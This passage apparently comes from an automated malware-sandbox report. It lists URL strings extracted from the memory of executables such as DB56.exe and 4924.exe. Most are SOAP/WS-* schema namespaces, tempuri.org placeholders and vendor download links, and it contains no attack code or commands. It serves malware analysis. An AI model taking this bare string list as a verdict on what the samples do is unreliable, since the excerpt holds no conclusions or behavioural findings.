                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                      Source: DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                      Source: DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                      Source: 8CE5.exe.5.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                      Source: 8CE5.exe.5.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: 8CE5.exe.5.drString found in binary or memory: http://ocsp.digicert.com0O
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                      Source: DB56.exe, 00000012.00000002.626049960.0000000002E90000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                      Source: DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                      Source: DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                      Source: 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                      Source: 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
